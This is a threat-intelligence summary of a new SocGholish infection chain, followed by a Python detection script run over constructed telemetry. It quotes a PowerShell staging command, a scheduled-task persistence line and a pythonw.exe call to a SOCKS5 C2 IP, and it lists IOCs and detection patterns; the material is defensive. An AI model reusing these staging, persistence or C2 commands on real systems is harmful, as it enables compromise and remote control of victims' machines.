New SocGholish Infection Chain Discovered – ReliaQuest

ReliaQuest reports a new SocGholish variant that uses Python to persist on hosts, marking a shift in its tactics beyond the Blister Loader. The infection chain starts with a suspicious JavaScript file (update.js), continues with the ingress of an embeddable Python package, a hidden Python-based execution stage, and a scheduled task that maintains persistence, with a SOCKS5 proxy used for C2 communications.

Key points

  • ReliaQuest observes SocGholish evolving to use Python for persistence rather than Blister Loader.
  • The campaign begins with JavaScript (update.js) delivered via drive-by compromise and executed through wscript.exe.
  • Ingress includes downloading a Python embed package from python.org, expanding it, and preparing a Python environment.
  • Execution relies on Python to run a script (hklib.py), with a SOCKS5 proxy-based C2 the script aims to establish.
  • Persistence is achieved by creating a Windows Scheduled Task (pypi-py) that runs frequently (every 5 minutes).
  • IOCs include a domain (oystergardens[dot]club), a hash (34b4d749924384409c12988f4c7690751f4b7f7c), and an IP (92.118.112[.]208) associated with the campaign.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – Ingress stage downloads python3.12.0 as a zip from the official repository and expands it for use. Quote: ‘Downloads python3.12.0 as “python.zip” from the official Python Foundation repository, confirms the download, and enumerates the download directory via the “ls” command.’
  • [T1059.001] PowerShell – The download/extraction sequence is invoked via PowerShell, embedded in a cmd.exe call. Quote: ‘“cmd.exe” /C powershell -c “wget hxxps[://]www[.]python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile c:\programdata\python.zip;ls c:\programdata\python.zip;Expand-Archive -LiteralPath c:\programdata\python.zip -DestinationPath c:\programdata\py3;del c:\programdata\python.zip;ls c:\programdata\py3”’
  • [T1059.007] JavaScript – The campaign involves JavaScript files like update.js used in SocGholish campaigns. Quote: ‘including “update.js,” a common file name used by SocGholish and other fake-update malware variants.’
  • [T1059.006] Python – Execution of Python scripts is used to stage and run the payload. Quote: ‘2. Executes the Python script “hklib.py” with the ingressed Python interpreter, “pythonw.exe”.’
  • [T1053.005] Scheduled Task – A persistent task is created to execute the Python payload regularly. Quote: ‘3. The task “pypi-py” is set to execute every 5 minutes and then executed immediately.’
  • [T1090] Proxy – The Python-based payload acts as a SOCKS5 proxy client to reach C2. Quote: ‘the hklib.py script is a SOCKS5 proxy client being used to establish a C2 connection to the IP and port specified in the command arguments.’

Indicators of Compromise

  • [Domain] oystergardens[dot]club – Domain used in the campaign to host or fetch malicious resources.
  • [Hash] 34b4d749924384409c12988f4c7690751f4b7f7c – File hash associated with the observed artifact(s) in the campaign.
  • [IP] 92.118.112[.]208 – C2 or proxy destination used by the malware for command and control traffic.
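As an added example that is not code from the ReliaQuest report or from this page: a small Python script that turns the MITRE techniques and the IOCs listed above into detection logic and runs it over constructed Sysmon-style telemetry. The event records (PIDs, user name, hostnames), the exact schtasks syntax, the port argument passed to hklib.py and the file path attached to the hash are assumptions made for the sample; only the file names (update.js, hklib.py, pythonw.exe), the task name pypi-py, the 5-minute interval, the python.org embeddable zip path and the three IOCs come from the page.

```python
"""Detection sketch for the SocGholish Python persistence chain summarised above.

Each rule maps to one stage of the chain; the chain verdict links hits that belong
to the same process tree so that a lone benign python.exe does not raise an alert.
"""
import re

# IOCs from the report (refanged here so they compare against real telemetry).
IOC_IPS = {"92.118.112.208"}
IOC_DOMAINS = {"oystergardens.club"}
IOC_HASHES = {"34b4d749924384409c12988f4c7690751f4b7f7c"}

# Constructed sample telemetry, NOT logs from the report. PIDs, the user name,
# the schtasks syntax, the port argument and the hash-to-path mapping are made up.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1201, "ppid": 900, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\update.js"'},
    {"type": "process", "pid": 1250, "ppid": 1201, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"cmd.exe" /C powershell -c "wget https://www.python.org/ftp/python/3.12.0/'
                r'python-3.12.0-embed-amd64.zip -OutFile c:\programdata\python.zip;'
                r'Expand-Archive -LiteralPath c:\programdata\python.zip -DestinationPath c:\programdata\py3"'},
    {"type": "file", "pid": 1250, "path": r"c:\programdata\py3\hklib.py",   # path is assumed
     "sha1": "34b4d749924384409c12988f4c7690751f4b7f7c"},
    {"type": "process", "pid": 1300, "ppid": 1250, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn pypi-py /sc minute /mo 5 '
                r'/tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\hklib.py 92.118.112.208 443"'},
    {"type": "process", "pid": 1400, "ppid": 1250, "image": r"c:\programdata\py3\pythonw.exe",
     "cmdline": r"c:\programdata\py3\pythonw.exe c:\programdata\py3\hklib.py 92.118.112.208 443"},
    {"type": "dns", "pid": 1400, "query": "oystergardens.club"},
    {"type": "network", "pid": 1400, "dest_ip": "92.118.112.208", "dest_port": 443},
    # Benign developer activity that must not match any rule.
    {"type": "process", "pid": 2000, "ppid": 800, "image": r"C:\Program Files\Python312\python.exe",
     "cmdline": r"python.exe build.py"},
]


def _cmd(e):
    return e.get("cmdline", "").lower()


def _img(e):
    return e.get("image", "").lower()


# (rule name, predicate) pairs, one per stage of the reported chain.
RULES = [
    ("T1059.007 wscript.exe executing update.js",
     lambda e: e["type"] == "process" and _img(e).endswith("wscript.exe") and "update.js" in _cmd(e)),
    ("T1105 PowerShell fetching the Python embeddable zip into ProgramData",
     lambda e: e["type"] == "process" and "powershell" in _cmd(e)
               and "embed-amd64.zip" in _cmd(e) and "programdata" in _cmd(e)),
    ("T1053.005 scheduled task pypi-py with a minute-level trigger",
     lambda e: e["type"] == "process" and _img(e).endswith("schtasks.exe")
               and re.search(r"/tn\s+pypi-py\b", _cmd(e)) and re.search(r"/sc\s+minute", _cmd(e))),
    ("T1059.006 pythonw.exe from ProgramData running hklib.py",
     lambda e: e["type"] == "process" and _img(e).endswith("pythonw.exe")
               and "programdata" in _img(e) and "hklib.py" in _cmd(e)),
    ("IOC file hash observed on disk",
     lambda e: e["type"] == "file" and e.get("sha1", "").lower() in IOC_HASHES),
    ("IOC domain resolved",
     lambda e: e["type"] == "dns" and e.get("query", "").lower() in IOC_DOMAINS),
    ("T1090 connection to the reported SOCKS5/C2 IP",
     lambda e: e["type"] == "network" and e.get("dest_ip") in IOC_IPS),
]


def match_rules(event):
    """Names of all rules the single event satisfies (empty list for benign events)."""
    return [name for name, pred in RULES if pred(event)]


def analyse(events):
    """Return (hits, chained).

    hits    : list of (pid, rule name) for every event that matched a rule.
    chained : {root pid: set of rule names} for process trees where at least three
              distinct stages were observed, i.e. the chain rather than a single IOC.
    """
    parent = {e["pid"]: e["ppid"] for e in events if e["type"] == "process"}
    hits = [(e["pid"], name) for e in events for name in match_rules(e)]

    def root(pid):
        seen = set()
        while pid in parent and pid not in seen:   # walk up until the tree's root
            seen.add(pid)
            pid = parent[pid]
        return pid

    trees = {}
    for pid, name in hits:
        trees.setdefault(root(pid), set()).add(name)
    chained = {r: stages for r, stages in trees.items() if len(stages) >= 3}
    return hits, chained


if __name__ == "__main__":
    hits, chained = analyse(SAMPLE_EVENTS)
    for pid, name in hits:
        print(f"pid {pid}: {name}")
    for root_pid, stages in chained.items():
        print(f"CHAIN under root pid {root_pid}: {len(stages)} stages")
```

The per-event rules are deliberately narrow (pythonw.exe only counts when it runs from ProgramData, schtasks only when the task name and minute trigger both appear) so that ordinary Python development on the same host stays quiet; the chain verdict then requires several stages in one process tree before it escalates beyond a single IOC match.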

Read more: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/